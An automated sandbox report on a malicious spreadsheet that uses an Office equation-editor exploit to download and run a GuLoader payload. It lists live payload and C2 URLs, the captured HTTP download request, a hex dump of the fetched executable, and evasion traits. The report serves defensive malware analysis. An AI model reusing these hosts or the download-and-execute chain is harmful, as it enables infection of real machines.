Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OR17233976_00019489_20170619154218.xlsx

Overview

General Information

Sample Name:OR17233976_00019489_20170619154218.xlsx
Analysis ID:623901
MD5:06f4851cbdc105cc140818b42f000b0e
SHA1:40ac7c31fd3e2f3524bd82200491741f02f9a1ef
SHA256:3844f8a2b3657d0141d505373f74beb01b6c2150c6931670bc241d600dca89eb
Tags:VelvetSweatshopxlsx
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
PE file contains more sections than normal
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 792 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1972 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2020 cmdline: "C:\Users\Public\vbc.exe" MD5: 78003B1DD8F6229A23A13087082E259C)
  • cleanup
{"Payload URL": "https://nordship.ru/bin_XpSIjvlBS226.bin"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.149.13.182, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1972, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1972, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://nordship.ru/bin_XpSIjvlBS226.bin"}
    Source: OR17233976_00019489_20170619154218.xlsxVirustotal: Detection: 40%Perma Link
    Source: OR17233976_00019489_20170619154218.xlsxReversingLabs: Detection: 24%
    Source: http://103.149.13.182/365space/.svchost.exeAvira URL Cloud: Label: malware

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.149.13.182 Port: 80
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
    Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406850 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03420652 ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034205F1 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034204C9 ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034204E2 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03420670 ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034204FE URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03420588 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0342063B ShellExecuteExW,ExitProcess,
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 84MB

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://nordship.ru/bin_XpSIjvlBS226.bin
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 May 2022 20:16:58 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 09 May 2022 21:26:38 GMTETag: "51bf8-5de9add0f38f0"Accept-Ranges: bytesContent-Length: 334840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b5 2e 05 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 c8 fb 04 00 30 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /365space/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.149.13.182Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.149.13.182/365space/.svchost.exe
    Source: EQNEDT32.EXE, 00000002.00000002.973889166.0000000003420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.149.13.182/365space/.svchost.exej
    Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.149.13.182/365space/.svchost.exemmC:
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsig
    Source: .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
    Source: .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
    Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
    Source: vbc.exe, 00000004.00000000.969965123.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.1176452278.000000000040A000.00000004.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: http://ocsp.sectigo.com0
    Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globals)
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
    Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, AEGISIIINVHelper.dll.4.dr, vbc.exe.2.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
    Source: .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: https://sectigo.com/CPS0C
    Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.9
    Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, AEGISIIINVHelper.dll.4.dr, vbc.exe.2.dr, AsSQLHelper.dll.4.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90EF2157.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: global trafficHTTP traffic detected: GET /365space/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.149.13.182Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

    System Summary

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_708A1BFF
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: .svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: wxbase30u_xml_gcc_custom.dll.4.drStatic PE information: Number of sections : 12 > 10
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
    Source: OR17233976_00019489_20170619154218.xlsxVirustotal: Detection: 40%
    Source: OR17233976_00019489_20170619154218.xlsxReversingLabs: Detection: 24%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$OR17233976_00019489_20170619154218.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR703F.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/26@0/1
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
